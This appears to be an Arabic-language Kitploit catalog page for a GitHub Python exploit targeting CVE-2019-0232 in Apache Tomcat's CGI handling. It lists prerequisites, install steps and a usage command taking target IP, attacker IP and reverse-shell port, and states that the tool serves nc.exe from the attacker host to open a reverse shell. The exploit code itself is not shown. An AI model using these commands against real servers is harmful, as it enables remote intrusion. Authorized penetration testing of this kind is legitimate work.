Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0232_tomcat_cgi_exploit — استغلال بايثون لـ CVE-2019-0232 يستهدف ثغرات CGI في Apache Tomcat مع اتصال شل عكسي آلي ومعلمات قابلة للتخصيص للهدف والمهاجم. | Kitploit
أدوات/GitHubGitHub/x3m1sec/cve-2019-0232_tomcat_cgi_exploit
توليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubx3m1sec/cve-2019-0232_tomcat_cgi_exploit

CVE-2019-0232_tomcat_cgi_exploit

استغلال بايثون لـ CVE-2019-0232 يستهدف ثغرات CGI في Apache Tomcat مع اتصال شل عكسي آلي ومعلمات قابلة للتخصيص للهدف والمهاجم.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

نص استغلال CGI لخادم Apache Tomcat

الوصف

نص برمجي بلغة Python مصمم لاستغلال ثغرات CGI في خوادم Apache Tomcat عن طريق تنفيذ اتصال شل عكسي.

مثال الاستخدام

مثال لتشغيل النص البرمجي

الميزات

  • استغلال آلي لثغرات CGI في Apache Tomcat
  • معلمات هدف ومهاجم قابلة للتخصيص
  • واجهة سطر أوامر بسيطة

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests
  • Netcat (nc.exe)
  • الوصول إلى مستمع لاستقبال الشل العكسي

التثبيت

root@kitploit:~
git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests

الاستخدام

root@kitploit:~
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>

الوسائط الإلزامية

  • -t, --target: عنوان IP للهدف الذي يعمل عليه Apache Tomcat
  • -i, --ip: عنوان IP للمهاجم الذي يستضيف nc.exe
  • -ncp, --nc-port: المنفذ الخاص باتصال الشل العكسي

الوسائط الاختيارية

  • -p, --port: منفذ الهدف (الافتراضي: 8080)
  • -sp, --server-port: منفذ الخادم لاستضافة nc.exe (الافتراضي: 80)
  • -cgi, --cgi-script: اسم نص CGI المراد استغلاله (الافتراضي: cmd.bat)

مثال

root@kitploit:~
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444

إخلاء المسؤولية القانوني

تم توفير هذه الأداة لأغراض تعليمية واختبارات الاختراق المصرح بها فقط. المؤلف والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر يسببه هذا النص البرمجي. احصل دائمًا على التصريح المناسب قبل اختبار أي نظام.

المؤلف

  • Jose Miguel Romero (k3Pn1c)
تنزيل الأداة